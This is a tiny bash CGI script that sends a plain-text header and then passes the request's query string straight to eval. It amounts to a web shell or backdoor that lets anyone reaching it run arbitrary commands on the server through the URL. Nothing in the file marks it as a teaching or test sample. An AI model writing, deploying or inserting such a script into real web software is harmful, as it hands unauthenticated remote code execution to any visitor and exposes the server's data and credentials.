#!/bin/bash
echo "Content-Type: text/plain"
echo ""
eval "$QUERY_STRING"
